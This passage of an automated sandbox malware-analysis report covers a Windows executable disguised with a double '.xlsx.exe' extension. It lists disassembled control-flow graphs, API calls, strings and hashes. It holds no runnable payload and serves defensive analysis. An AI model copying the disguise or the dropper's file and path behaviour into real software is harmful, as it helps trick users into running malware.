4051f2 call 405de2 535->538 539 405902-405908 535->539 538->513 539->513
                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004057F9
                                                                            • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405841
                                                                            • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405864
                                                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040586A
                                                                            • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040587A
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                                            • FindClose.KERNEL32(00000000), ref: 00405929
                                                                            Strings
                                                                            • \*.*, xrefs: 0040583B
                                                                            • "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 004057D9
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-707783126
                                                                            • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                                            • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                                            • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                                            • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                            • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                                            • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                            • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406296
                                                                            • FindClose.KERNEL32(00000000), ref: 004062A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: 8WB
                                                                            • API String ID: 2295610775-3088156181
                                                                            • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                            • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                                            • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                            • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                            • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                                            • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                            • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004020BD
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 004020FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
                                                                            • API String ID: 542301482-4070182260
                                                                            • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                            • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                                            • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                            • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                                            • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                                            • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                                            • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 181 403ec8-403ecd call 4041e6 177->181 182 403e8a-403e8d 177->182 178->177 183 403cf1-403cfe SetWindowPos 179->183 184 403d04-403d07 179->184 196 403ed2-403eed 181->196 188 403ec0-403ec2 182->188 189 403e8f-403e9a call 401389 182->189 183->184 185 403d21-403d27 184->185 186 403d09-403d1b ShowWindow 184->186 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->181 195 404167 188->195 189->188 210 403e9c-403ebb SendMessageW 189->210 200 403d48-403d54 SetWindowLongW 191->200 201 403d59-403d5f 191->201 198 404144-40414a 192->198 197 404169-404170 195->197 203 403ef6-403efc 196->203 204 403eef-403ef1 call 40140b 196->204 198->195 211 40414c-404152 198->211 200->197 208 403e02-403e10 call 404201 201->208 209 403d65-403d76 GetDlgItem 201->209 206 403f02-403f0d 203->206 207 404125-40413e DestroyWindow EndDialog 203->207 204->203 206->207 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 206->213 207->198 208->197 214 403d95-403d98 209->214 215 403d78-403d8f SendMessageW IsWindowEnabled 209->215 210->197 211->195 212 404154-40415d ShowWindow 211->212 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->208 227 403de9-403dfc SendMessageW 223->227 228 403daa-403dac 223->228 224->227 229 403db5-403dbb 224->229 227->208 228->222 230 403dd2-403ddb call 40140b 229->230 231 403dbd-403dc3 call 40140b 229->231 230->208 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->198 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->198 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->198
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                            • ShowWindow.USER32(?), ref: 00403D1B
                                                                            • DestroyWindow.USER32 ref: 00403D2F
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                            • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                                            • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                            • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                            • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                            • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                            • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: 4Ct$&B
                                                                            • API String ID: 3282139019-3485676415
                                                                            • Opcode ID: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
                                                                            • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                                            • Opcode Fuzzy Hash: 1ba26ddb7cc3656f9a64845b4b1793df4e6810f285f0ef41b34257c574bccbbf
                                                                            • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 289 4039a5-4039ce call 403bf5 call 405a9b 280->289 285 403984-403995 call 405e15 281->285 286 40399a-4039a0 lstrcatW 281->286 285->286 286->289 295 403a60-403a68 call 405a9b 289->295 296 4039d4-4039d9 289->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405f6a 295->303 296->295 297 4039df-403a07 call 405e15 296->297 297->295 307 403a09-403a0d 297->307 305 403b1c-403b24 call 40140b 302->305 306 403a9d-403acd RegisterClassW 302->306 303->302 320 403b26-403b29 305->320 321 403b2e-403b39 call 403bf5 305->321 308 403ad3-403b17 SystemParametersInfoW CreateWindowExW 306->308 309 403beb 306->309 311 403a1f-403a2b lstrlenW 307->311 312 403a0f-403a1c call 4059c0 307->312 308->305 317 403bed-403bf4 309->317 314 403a53-403a5b call 405993 call 405f48 311->314 315 403a2d-403a3b lstrcmpiW 311->315 312->311 314->295 315->314 319 403a3d-403a47 GetFileAttributesW 315->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->317 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->314 323->324 324->314 335 403bc8-403bca 330->335 333 403b65-403b77 GetClassInfoW 331->333 334 403b5e-403b63 LoadLibraryW 331->334 336 403b79-403b89 GetClassInfoW RegisterClassW 333->336 337 403b8f-403bb2 DialogBoxParamW call 40140b 333->337 334->333 339 403be4-403be6 call 40140b 335->339 340 403bcc-403bd2 335->340 336->337 341 403bb7-403bc0 call 40386f 337->341 339->309 340->320 342 403bd8-403bdf call 40140b 340->342 341->317 342->320
                                                                            APIs
                                                                              • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                                              • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                                              • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                            • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004039A0
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                            • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                                            • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                            • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                            • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                            • API String ID: 914957316-4138227134
                                                                            • Opcode ID: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
                                                                            • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                                            • Opcode Fuzzy Hash: 88edaa45a3bb59404545fecdb829bfa4bbc7651b3de16964f3c32b9c1e3b42f4
                                                                            • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 368 403013-403018 360->368 369 402f48-402f4b 360->369 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 370 402e78-402e7e 364->370 371 402fcf-402fd7 call 402d1a 364->371 368->353 372 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 369->372 373 402f4d-402f65 call 40330f call 4032f9 369->373 374 402e80-402e98 call 405b6f 370->374 375 402efe-402f02 370->375 371->368 399 402fc5-402fca 372->399 400 402fd9-403009 call 40330f call 403062 372->400 373->368 396 402f6b-402f71 373->396 380 402f0b-402f11 374->380 394 402e9a-402ea1 374->394 379 402f04-402f0a call 402d1a 375->379 375->380 379->380 387 402f13-402f21 call 406360 380->387 388 402f24-402f2e 380->388 387->388 388->360 388->361 394->380 398 402ea3-402eaa 394->398 396->368 396->372 398->380 401 402eac-402eb3 398->401 399->353 407 40300e-403011 400->407 401->380 403 402eb5-402ebc 401->403 403->380 405 402ebe-402ede 403->405 405->368 408 402ee4-402ee8 405->408 407->368 409 40301a-40302b 407->409 410 402ef0-402ef8 408->410 411 402eea-402eee 408->411 412 403033-403038 409->412 413 40302d 409->413 410->380 414 402efa-402efc 410->414 411->360 411->410 415 403039-40303f 412->415 413->412 414->380 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402DD0
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,?), ref: 00402DEC
                                                                              • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                                              • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00402E35
